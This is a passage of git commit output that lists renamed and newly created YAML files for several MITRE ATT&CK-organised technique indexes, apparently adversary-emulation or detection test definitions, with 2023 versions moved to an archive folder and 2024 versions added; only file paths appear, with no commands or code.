(100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_adfind_bulk_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_ldap_users_v1.yml (100%) rename {fs-index-2023 => 
archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1087.002_net_user_groups_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Exfiltration/T1048.003_httpexfil_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1078_suspicious_login_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1110.003_externalspray_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1566.002_spl_iso_v1.yml (100%) rename 
{fs-index-2023 => archived/2023/fs-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.002_smbc2_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.003_scheduledtask_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1057_processdiscovery_remote_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/LateralMovement/T1570_execopy_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Persistence/T1547.001_runkey_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/NOTEBOOK.md (100%) rename {h-index-2023 => archived/2023/h-index-2023}/REQUIREMENTS.md (100%) rename {h-index-2023 => archived/2023/h-index-2023}/h-index-2023-v1.2-summary.csv (100%) rename {h-index-2023 => archived/2023/h-index-2023}/h-index-2023-v1.2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/navigator.json (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Collection/T1056.001_keylog_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%) rename {h-index-2023 => 
archived/2023/h-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_creddumpmemory_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.001_processhacker_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.002_hashdump_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1140_certutil_decode_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%) rename {h-index-2023 => 
archived/2023/h-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1057_processdiscovery_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.001_net_localgroup_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_adfind_bulk_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1087.002_setspn_collection_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Discovery/T1518.001_securitydiscovery_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Exfiltration/T1041_httpc2exfil_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_encarchive_macro_v1.yml (100%) rename {h-index-2023 => 
archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.001_zipped_js_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1547.001_runonce_v2.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1547.001_startupfolder_v1.yml (100%) rename {h-index-2023 => archived/2023/h-index-2023}/techniques/Persistence/T1564.002_hide_user_logon_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/NOTEBOOK.md (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/REQUIREMENTS.md (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/navigator.json (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/rh-index-2023-v1.2-summary.csv (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/rh-index-2023-v1.2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%) rename {rh-index-2023 => 
archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.001_processhacker_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.002_hashdump_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1003.006_dcsync_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%) rename {rh-index-2023 => 
archived/2023/rh-index-2023}/techniques/Discovery/T1018_nltest_dclist_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1049_sessiongopher_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1082_systeminfo_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.001_net_localgroup_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_ad_explorer_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_net_domainadmins_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1087.002_setspn_collection_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1135_netview_shares_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Discovery/T1482_nltest_all_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1059.005_vbs_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1106_exe_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1204.002_macro_hta_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Execution/T1204.002_macro_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Impact/T1021.002_remote_ransomware_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Impact/T1486_ransomware_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml (100%) rename {rh-index-2023 => 
archived/2023/rh-index-2023}/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1078_suspicious_login_v3.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/InitialAccess/T1621_mfa_spam_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/LateralMovement/T1021.001_rdp_v2.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/LateralMovement/T1021.003_wmipcc_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1053.005_schtask_v7.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1098.005_aadjoin_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1136.001_newlocaladmin_v1.yml (100%) rename {rh-index-2023 => archived/2023/rh-index-2023}/techniques/Persistence/T1543.003_newservice_reg_v1.yml (100%) create mode 100644 fs-index-2024/CHANGELOG.md create mode 100644 fs-index-2024/REQUIREMENTS.md create mode 100644 fs-index-2024/fs-index-2024-v1.0-layer.json create mode 100644 fs-index-2024/fs-index-2024-v1.0-notebook.md create mode 100644 fs-index-2024/fs-index-2024-v1.0-summary.csv create mode 100644 fs-index-2024/fs-index-2024-v1.0.yml create mode 100644 fs-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml create mode 100644 fs-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml create mode 100644 
fs-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml create mode 100644 fs-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml create mode 100644 fs-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml create mode 100644 fs-index-2024/techniques/CommandandControl/43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml create mode 100644 fs-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml create mode 100644 fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml create mode 100644 fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml create mode 100644 
fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml create mode 100644 fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml create mode 100644 fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml create mode 100644 fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml create mode 100644 fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml create mode 100644 fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml create mode 100644 fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml create mode 100644 fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml create mode 100644 fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml create mode 100644 fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml create mode 100644 fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml create mode 100644 fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml create mode 100644 fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml create mode 100644 fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml create mode 100644 fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml create mode 100644 fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml create mode 100644 fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml create mode 100644 fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml create mode 100644 fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml create mode 100644 fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml create mode 100644 
fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml create mode 100644 fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml create mode 100644 fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml create mode 100644 fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml create mode 100644 fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml create mode 100644 fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml create mode 100644 fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml create mode 100644 fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml create mode 100644 fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml create mode 100644 h-index-2024/CHANGELOG.md create mode 100644 h-index-2024/REQUIREMENTS.md create mode 100644 h-index-2024/h-index-2024-v1.0-layer.json create mode 100644 h-index-2024/h-index-2024-v1.0-notebook.md create mode 100644 h-index-2024/h-index-2024-v1.0-summary.csv create mode 100644 h-index-2024/h-index-2024-v1.0.yml create mode 100644 h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml create mode 100644 h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml create mode 100644 h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml create mode 100644 h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml create mode 100644 h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml create mode 100644 h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml create mode 100644 h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml create mode 100644 
h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml create mode 100644 h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml create mode 100644 h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml create mode 100644 h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml create mode 100644 h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml create mode 100644 h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml create mode 100644 h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml create mode 100644 h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml create mode 100644 h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml create mode 100644 h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml create mode 100644 h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml create mode 100644 h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml create mode 100644 h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml create mode 100644 h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml create mode 100644 
h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml create mode 100644 h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml create mode 100644 h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml create mode 100644 h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml create mode 100644 h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml create mode 100644 h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml create mode 100644 h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml create mode 100644 h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml create mode 100644 h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml create mode 100644 h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml create mode 100644 h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml create mode 100644 h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml create mode 100644 h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml create mode 100644 h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml create mode 100644 h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml create mode 100644 h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml create mode 100644 h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml create mode 100644 h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml create mode 100644 h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml create mode 100644 h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml create mode 100644 
h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml create mode 100644 h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml create mode 100644 h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml create mode 100644 h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml create mode 100644 ot-index-2024/CHANGELOG.md create mode 100644 ot-index-2024/REQUIREMENTS.md create mode 100644 ot-index-2024/ot-index-2024-v1.0-layer.json create mode 100644 ot-index-2024/ot-index-2024-v1.0-notebook.md create mode 100644 ot-index-2024/ot-index-2024-v1.0-summary.csv create mode 100644 ot-index-2024/ot-index-2024-v1.0.yml create mode 100644 ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml create mode 100644 ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml create mode 100644 ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml create mode 100644 ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml create mode 100644 ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml create mode 100644 ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml create mode 100644 ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml create mode 100644 
